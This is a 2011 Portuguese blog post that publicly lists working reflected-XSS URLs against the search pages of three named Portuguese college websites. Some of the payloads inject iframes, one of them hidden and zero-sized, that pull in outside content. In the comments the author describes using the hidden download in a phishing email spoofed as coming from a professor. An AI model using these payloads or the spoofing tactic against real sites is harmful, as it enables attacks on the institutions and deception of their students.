XSS em sites de faculdades

 

Infelizmente parece que a incompetência também existe em determinadas instituições do ensino superior.

Vou deixar mais alguns sites vulneráveis a XSS:

http://www.uevora.pt/pesquisa/resultado?query=%3E%22%3E%3Ciframe+src%3D%22http%3A%2F%2Fseczero.wordpress.com%22%%20%203E

https://www.ubi.pt/Pesquisar.aspx?pesquisar=%3E%22%3E%3C%22%3E%3Ciframe%20height=%220%22%20width=%220%22%20frameborder=%220%22%20src=%22http://darkstar.ist.utl.pt/openbsd/4.8/i386/install48.iso%22%3E%3C/iframe%3E

https://www1.esec.pt/pesquisa.php?palavra=%3Cscript%3Ealert(/seczero/)%3C/script%3E

P.S: Talvez o site da ESEC não mereça estar neste post, visto que não é uma faculdade virada para as tecnologias mas de qualquer das maneiras decidi juntar à lista para os alertar.

Anúncios

~ por bsdworks em Fevereiro 1, 2011.

8 Respostas to “XSS em sites de faculdades”

  1. Mas tipo como é que uma pessoa chega a essa falha.
    Citando:
    Sou um user, vou a esse site à procura de um ficheiro, como é que esse teu “vírus” poderia vir ter comigo?

    • Imagina que estudas na UBI. Eu envio-te um email com o remetente prof.paulo@ubi.pt mailto:prof.paulo@ubi.pt e digo-te que precisas de descarregar essa aplicação para usares numa cadeira qualquer. Isto é só um exemplo, podes usar tantas técnicas.

      Tudo depende da tua criatividade. 🙂

  2. é possível enviares mails sem teres o domínio do mesmo? 😮

  3. E o que se pode fazer com o XSS? -.-‘

Deixe uma Resposta

Preencha os seus detalhes abaixo ou clique num ícone para iniciar sessão:

Logótipo da WordPress.com

Está a comentar usando a sua conta WordPress.com Terminar Sessão / Alterar )

Imagem do Twitter

Está a comentar usando a sua conta Twitter Terminar Sessão / Alterar )

Facebook photo

Está a comentar usando a sua conta Facebook Terminar Sessão / Alterar )

Google+ photo

Está a comentar usando a sua conta Google+ Terminar Sessão / Alterar )

Connecting to %s

 
%d bloggers like this: